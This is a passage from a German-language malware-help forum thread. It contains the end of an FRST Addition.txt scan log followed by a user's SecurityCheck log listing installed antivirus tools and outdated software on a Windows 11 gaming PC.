{F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. 
-> Gen Digital Inc.) ShellIconOverlayIdentifiers-x32: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers1: [BUContextMenu] -> {F7CAA2A1-67A2-44BB-B20F-202FD8EB1DAB} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ContextMenuHandlers1: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ContextMenuHandlers2: [FileLocksmithExt] -> {84D68575-E186-46AD-B0CB-BAEB45EE29C0} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.FileLocksmithExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers2: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ContextMenuHandlers3: [FileLocksmithExt] -> {84D68575-E186-46AD-B0CB-BAEB45EE29C0} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.FileLocksmithExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2024-06-04] (Malwarebytes Inc. 
-> Malwarebytes) ContextMenuHandlers3: [PowerRenameExt] -> {0440049F-D1DC-4E46-B27B-98393D79486B} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.PowerRenameExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\nvshext.dll [2024-02-08] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers5: [PowerRenameExt] -> {0440049F-D1DC-4E46-B27B-98393D79486B} => C:\Program Files\PowerToys\WinUI3Apps\PowerToys.PowerRenameExt.dll [2024-05-26] (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers6: [BUContextMenu] -> {F7CAA2A1-67A2-44BB-B20F-202FD8EB1DAB} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2024-06-04] (Malwarebytes Inc. -> Malwarebytes) ContextMenuHandlers6: [NortonLifeLock.Norton.Antivirus.IEContextMenu] -> {FAD61B3D-699D-49B2-BE16-7F82CB4C59CA} => C:\Program Files\Norton Security\Engine\22.24.2.6\NavShExt.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ==================== Codecs (Nicht auf der Ausnahmeliste) ==================== ==================== Verknüpfungen & WMI ======================== (Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.) 
ShortcutWithArgument: C:\Users\skysc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\188f5ec9d11ded56\Persönlich 2 - Edge.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (Microsoft Corporation) -> --profile-directory="Profile 1" ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============= ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ======== ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) 
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\regfile: <==== ACHTUNG HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.reg: => <==== ACHTUNG HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.bat: => <==== ACHTUNG HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Classes\.cmd: => <==== ACHTUNG ==================== Internet Explorer (Nicht auf der Ausnahmeliste) ========== HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://localoem.msn.com/?pc=SBJB HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://localoem.msn.com/?pc=SBJB HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://localoem.msn.com/?pc=SBJB HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://localoem.msn.com/?pc=SBJB BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2022-06-22] (Microsoft Corporation -> Microsoft Corporation) Toolbar: HKLM-x32 - Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Keine Datei Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - 
{5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation) (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) IE trusted site: HKU\.DEFAULT\...\adaware.com -> hxxp://adaware.com IE trusted site: HKU\.DEFAULT\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\localhost -> localhost ==================== Hosts Inhalt: ========================= (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2022-05-07 07:24 - 2024-07-23 15:17 - 000000027 _____ C:\Windows\system32\drivers\etc\hosts 127.0.0.1 localhost ==================== Andere Bereiche =========================== (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\skysc\AppData\Local\Microsoft\Windows\Themes\green\DesktopBackground\design ohne titel.jpg HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg DNS Servers: 192.168.2.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) ist aktiviert. Network Binding: ============= Ethernet: Realtek PCIe GbE Family Controller -> rt68cx21x64.sys netvsc_vfpp: Microsoft NetVsc Failover VF Protocol ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) 
HKLM\...\StartupApproved\Run: => "RtkAudUService" HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\StartupFolder: => "SearchEngineOptimizer.lnk" HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_E457065EC9FFC031D52374F8B9832F00" HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Opera GX Stable" HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Opera GX Browser Assistant" HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "EpicGamesLauncher" HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Discord" HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "SUPERAntiSpyware" HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\StartupApproved\Run: => "Lunar Client" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================ (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{E8534983-99FC-4813-8A32-4BDF79D77A10}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{DC40325A-F8C9-4E26-BB00-752EF503041E}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{7474212F-5321-4112-A0EA-F6B43DBB7CC2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation) FirewallRules: [{DD47FF0F-4E4B-4A54-97BE-40F30D10A97A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. 
-> Valve Corporation) FirewallRules: [TCP Query User{8EEA38C7-2FF3-4EAD-A0DB-52633701FD43}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe FirewallRules: [UDP Query User{07AD8478-7D92-4DBD-B22F-B61CE4ACEB13}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe FirewallRules: [{A447F68E-3F14-4304-B618-752761625611}] => (Allow) C:\Program Files (x86)\Overwolf\0.256.0.2\OverwolfBrowser.exe (Overwolf Ltd -> Overwolf LTD) FirewallRules: [{418282C4-3526-40BD-8F8D-7DFE215E55B1}] => (Allow) C:\Program Files (x86)\Overwolf\0.256.0.2\OverwolfBrowser.exe (Overwolf Ltd -> Overwolf LTD) FirewallRules: [{8DB183CB-14DD-457A-8A2C-7DDE4ABCE532}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [{347C93E5-760A-4741-A101-596711870073}] => (Allow) LPort=32683 FirewallRules: [{EFCE4288-3DBD-4C1A-8BEF-5A9FD557170D}] => (Allow) LPort=26822 FirewallRules: [{7606C23E-29AB-48B7-9525-CD1FF1876A84}] => (Allow) C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe (Brave Software, Inc. -> Brave Software, Inc.) 
==================== Wiederherstellungspunkte ========================= 17-07-2024 19:25:24 ScanGuard-Installation 18-07-2024 16:44:58 Revo Uninstaller's restore point - SpyHunter 5 18-07-2024 16:46:51 Revo Uninstaller's restore point - AVG AntiVirus Free 20-07-2024 14:38:51 Revo Uninstaller's restore point - ScanGuard 21-07-2024 13:51:58 Revo Uninstaller's restore point - ReMouse Standard 22-07-2024 23:26:21 Revo Uninstaller's restore point - SUPERAntiSpyware ==================== Fehlerhafte Geräte im Gerätemanager ============ Name: GENERAL WEBCAM Description: USB-Videogerät Class Guid: {ca3e7ab9-b4c3-4ae6-8251-579ef933890f} Manufacturer: Microsoft Service: usbvideo Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Fehlereinträge in der Ereignisanzeige: ======================== Applikationsfehler: ================== Error: (07/24/2024 09:54:57 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: SKYSGAMINGPC-CA) Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\Windows\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126). 
Error: (07/24/2024 09:54:47 PM) (Source: Application Error) (EventID: 1000) (User: SKYSGAMINGPC-CA) Description: Name der fehlerhaften Anwendung: MSI_GamebarTool.exe, Version: 2.0.0.11, Zeitstempel: 0xd36e1d1f Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.22621.3880, Zeitstempel: 0xdb9989e8 Ausnahmecode: 0xe0434352 Fehleroffset: 0x000000000005fabc ID des fehlerhaften Prozesses: 0x0xf40 Startzeit der fehlerhaften Anwendung: 0x0x1dade0350832a1c Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\MSI\MSI Companion\MSI_GamebarTool.exe Pfad des fehlerhaften Moduls: C:\Windows\System32\KERNELBASE.dll Berichtskennung: ce9e05b7-8a5a-4ac8-99a0-ecd1526e0cbd Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (07/24/2024 09:54:46 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Anwendung: MSI_GamebarTool.exe Frameworkversion: v4.0.30319 Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet. 
Ausnahmeinformationen: System.IO.FileNotFoundException bei WpfApp10.App.Application_Startup(System.Object, System.Windows.StartupEventArgs) bei System.Windows.Application.OnStartup(System.Windows.StartupEventArgs) bei System.Windows.Application.<.ctor>b__1_0(System.Object) bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.DispatcherOperation.InvokeImpl() bei MS.Internal.CulturePreservingExecutionContext.CallbackWrapper(System.Object) bei System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) bei MS.Internal.CulturePreservingExecutionContext.Run(MS.Internal.CulturePreservingExecutionContext, System.Threading.ContextCallback, System.Object) bei System.Windows.Threading.DispatcherOperation.Invoke() bei System.Windows.Threading.Dispatcher.ProcessQueue() bei System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) bei MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) bei MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object) bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.Dispatcher.LegacyInvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32) bei 
MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr) bei MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef) bei System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame) bei System.Windows.Application.RunDispatcher(System.Object) bei System.Windows.Application.RunInternal(System.Windows.Window) bei WpfApp10.App.Main() Error: (07/24/2024 09:54:42 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Local Hostname skysgamingpc-capi.local already in use; will try skysgamingpc-capi-2.local instead Error: (07/24/2024 09:54:42 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 skysgamingpc-capi.local. Addr 192.168.2.111 Error: (07/24/2024 09:54:42 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.2.111:5353 16 skysgamingpc-capi.local. AAAA 2003:00D2:C707:2800:031B:89C5:A284:FD97 Error: (07/24/2024 09:54:42 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 16 skysgamingpc-capi.local. AAAA FE80:0000:0000:0000:B0A7:1013:755D:9641 Error: (07/24/2024 09:54:42 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 4 skysgamingpc-capi.local. Addr 192.168.2.111 Systemfehler: ============= Error: (07/24/2024 09:56:40 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung. 
Error: (07/24/2024 09:56:40 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Google Update-Dienst (gupdate) erreicht. Error: (07/24/2024 09:54:43 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 6 Mal passiert. Error: (07/24/2024 09:54:43 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet: Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt. Error: (07/24/2024 09:54:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 5 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts. Error: (07/24/2024 09:54:42 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet: Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt. Error: (07/24/2024 09:54:40 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 4 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts. Error: (07/24/2024 09:54:40 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet: Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt. Windows Defender: ================ Date: 2024-07-24 15:41:07 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. 
Überprüfungs-ID: {FD7F2462-F47E-4902-9C9D-AB053D1F2685} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2024-07-22 17:28:46 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {7AC7B037-E956-44C8-9B4C-DB9240EE71AB} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2024-07-21 13:35:58 Description: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe wurde durch den überwachten Ordnerzugriff daran gehindert, %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente zu ändern. Erkennungszeit: 2024-07-21T11:35:58.436Z Benutzer: SKYSGAMINGPC-CA\skysc Pfad: %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente Prozessname: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe Sicherheitsversion: 1.415.215.0 Modulversion: 1.1.24060.5 Produktversion: 4.18.24060.7 Date: 2024-07-20 15:26:46 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {B889A637-0393-4E52-937D-977966347CE0} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2024-07-20 14:46:03 Description: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe wurde durch den überwachten Ordnerzugriff daran gehindert, %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente zu ändern. Erkennungszeit: 2024-07-20T12:46:03.035Z Benutzer: SKYSGAMINGPC-CA\skysc Pfad: %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente Prozessname: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe Sicherheitsversion: 1.415.174.0 Modulversion: 1.1.24060.5 Produktversion: 4.18.24060.7 Event[0] Date: 2024-07-15 17:37:29 Description: Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features. 
Feature: Bei Zugriff Fehlercode: 0x8007043c Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden. Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden. Date: 2024-06-16 16:43:01 Description: Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features. Feature: Verhaltensüberwachung Fehlercode: 0x80070002 Fehlerbeschreibung: Das System kann die angegebene Datei nicht finden. Ursache: Der Filtertreiber benötigt eine aktuelles Modul. Sie müssen die neuesten Updates der Sicherheitsinformationen installieren, um Echtzeitschutz zu gewährleisten. Date: 2024-06-15 22:05:17 Description: Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features. Feature: Netzwerkinspektionssystem Fehlercode: 0x8007045b Fehlerbeschreibung: Der Computer wird heruntergefahren. Ursache: Dem System fehlen erforderliche Updates zum Ausführen des Netzwerkinspektionssystems. Installieren Sie die erforderlichen Updates, und starten Sie das Gerät neu. Date: 2024-06-13 18:06:16 Description: Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Security Intelligence aufgetreten. Es wird versucht, zu einer vorherigen Version zurückzukehren. Security Intelligence versucht: Sicherung Fehlercode: 0x80004004 Fehlerbeschreibung: Vorgang abgebrochen Security Intelligence-Version: 1.413.76.0;1.413.76.0 Modulversion: 1.1.24050.5 Date: 2024-06-13 18:06:16 Description: Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Security Intelligence aufgetreten. Es wird versucht, zu einer vorherigen Version zurückzukehren. Security Intelligence versucht: Aktuell Fehlercode: 0x80501102 Fehlerbeschreibung: Unerwartetes Problem. Installieren Sie bei Bedarf verfügbare Updates, und starten Sie das Programm dann erneut. Informationen zum Installieren von Updates finden Sie unter "Hilfe und Support". 
Security Intelligence-Version: 1.413.266.0;1.413.266.0 Modulversion: 1.1.24050.5 CodeIntegrity: =============== Date: 2024-07-24 22:01:12 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2024-07-24 21:58:42 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2024-07-24 21:57:12 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\SecurityHealthService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Norton Security\Engine\22.24.2.6\symamsi.dll that did not meet the Windows signing level requirements. Date: 2024-07-24 21:56:41 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe) attempted to load \Device\HarddiskVolume3\Program Files\Norton Security\Engine\22.24.2.6\symamsi.dll that did not meet the Microsoft signing level requirements. Date: 2024-07-24 21:56:40 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Norton Security\Engine\22.24.2.6\symamsi.dll that did not meet the Windows signing level requirements. ==================== Speicherinformationen =========================== BIOS: American Megatrends International, LLC. A.B0 08/11/2022 Hauptplatine: Micro-Star International Co., Ltd. 
B550-A PRO (MS-7C56) Prozessor: AMD Ryzen 7 5800X 8-Core Processor Prozentuale Nutzung des RAM: 26% Installierter physikalischer RAM: 32694.09 MB Verfügbarer physikalischer RAM: 24136.53 MB Summe virtueller Speicher: 43958.09 MB Verfügbarer virtueller Speicher: 33923.95 MB ==================== Laufwerke ================================ Drive c: (Windows) (Fixed) (Total:1906.64 GB) (Free:44.97 GB) (Model: TEAM TM8FPD002T) NTFS \\?\Volume{41e7a2f5-393b-493b-be00-74394b7a817d}\ (Recovery tools) (Fixed) (Total:0.98 GB) (Free:0.32 GB) NTFS \\?\Volume{7b3d089e-4810-4004-aca0-af67060b3ad4}\ (SYSTEM) (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32 ==================== MBR & Partitionstabelle ==================== ========================================================== Disk: 0 (Size: 1907.7 GB) (Disk ID: BDAE7615) Partition: GPT. ==================== Ende von Addition.txt ======================= |
24.07.2024, 21:12 | #8 |
| Here is the SecurityCheck log as well: Code:
SecurityCheck by glax24 & Severnyj v.1.4.0.57 [24.01.24]
WebSite: www.safezone.cc
DateLog: 24.07.2024 22:06:32
Path starting: C:\Users\skysc\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe
Log directory: C:\SecurityCheck\
IsAdmin: True
User: skysc
VersionXML: 12.40is-24.07.2024
___________________________________________________________________________
Windows 11(6.3.22631) (x64) Core Release: 23H2 Lang: German(0407)
Installation date OS: 07.08.2023 12:09:18
LicenseStatus: Windows(R), Core edition The machine is permanently activated.
LicenseStatus: Office 16, Office16O365HomePremR_Grace edition Windows is in Notification mode
Boot Mode: Normal
Default Browser: C:\Users\skysc\AppData\Local\Programs\Opera GX\Launcher.exe
SystemDrive: C: FS: [NTFS] Capacity: [1906.6 Gb] Used: [1861.6 Gb] Free: [45 Gb]
------------------------------- [ Windows ] -------------------------------
User Account Control enabled (Level 3)
Norton WSC Service (nsWscSvc) - The service is running
Remoteregistrierung (RemoteRegistry) - The service has stopped
SSDP-Suche (SSDPSRV) - The service is running
Remotedesktopdienste (TermService) - The service has stopped
Windows-Remoteverwaltung (WS-Verwaltung) (WinRM) - The service has stopped
---------------------------- [ Antivirus_WMI ] ----------------------------
Windows Defender (enabled and up to date)
Norton 360 for Gamers (disabled)
---------------------------- [ Firewall_WMI ] -----------------------------
Norton 360 for Gamers
---------------------- [ AntiVirusFirewallInstall ] -----------------------
Malwarebytes version 5.1.6.117 v.5.1.6.117
Norton 360 v.22.24.2.6
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft 365 - de-de v.16.0.15225.20204 Warning! Download Update How Install Office updates?
Microsoft 365 - en-us v.16.0.15225.20204 Warning! Download Update How Install Office updates?
Microsoft 365 - es-es v.16.0.15225.20204 Warning! Download Update How Install Office updates?
Microsoft 365 - fr-fr v.16.0.15225.20204 Warning! Download Update How Install Office updates?
Microsoft 365 - it-it v.16.0.15225.20204 Warning! Download Update How Install Office updates?
NVIDIA GeForce Experience 3.27.0.120 v.3.27.0.120 Warning! Download Update
Microsoft Visual Studio Code (User) v.1.90.2 Warning! Download Update
Microsoft Edge WebView2-Laufzeit v.126.0.2592.113
Steam v.2.10.91.91
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 v.14.36.32532.0 Warning! Download Update
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 v.14.36.32532.0 Warning! Download Update
------------------------------- [ Backup ] --------------------------------
Microsoft OneDrive v.24.132.0701.0002 [+]
------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 6.23 (64-Bit) v.6.23.0 Warning! Download Update
